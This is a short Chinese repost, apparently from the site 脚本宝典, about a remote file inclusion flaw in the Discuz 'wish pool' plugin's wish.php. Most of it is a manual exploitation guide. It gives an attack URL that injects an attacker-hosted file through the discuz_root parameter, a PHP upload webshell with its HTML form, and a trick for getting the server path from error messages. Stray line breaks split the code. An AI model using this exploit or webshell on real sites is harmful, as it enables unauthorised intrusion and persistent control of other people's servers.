脚本宝典收集整理的这篇文章主要介绍了discuz许愿池插件远程包含漏洞,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
许愿池插件的wish.php文件出的问题:
require&nbs
p;$discuz_root.'./include/discuzcode.func.php';
手工利用方法:
远程包含漏洞,变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.neeao
.COM/xxxx.txt?
不一定非要txt后缀,可以
改为任意后缀,后面一定要记得加问号。
这里xxxx.txt用CN.Tink的那个小马写个shell进去:
<?copy(
$_FILES[MyFile][
tmp_n
ame],"C:\
inetp
ub\vhosts\b
aidu.com\
BBS\guizai.php");?>
<form ENCTY
PE="multipart/form-data" ACTION="" 
;mETHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="subm
IT">
</form>
网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.huaidan.
org/xxxx.txt ,看
错误提示信息,然后修改xxxx.txt中的路径即可。 guizai.php就是你上传的shell的名字。
脚本宝典总结
以上是脚本宝典为你收集整理的discuz许愿池插件远程包含漏洞全部内容,希望文章能够帮你解决discuz许愿池插件远程包含漏洞所遇到的问题。
如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。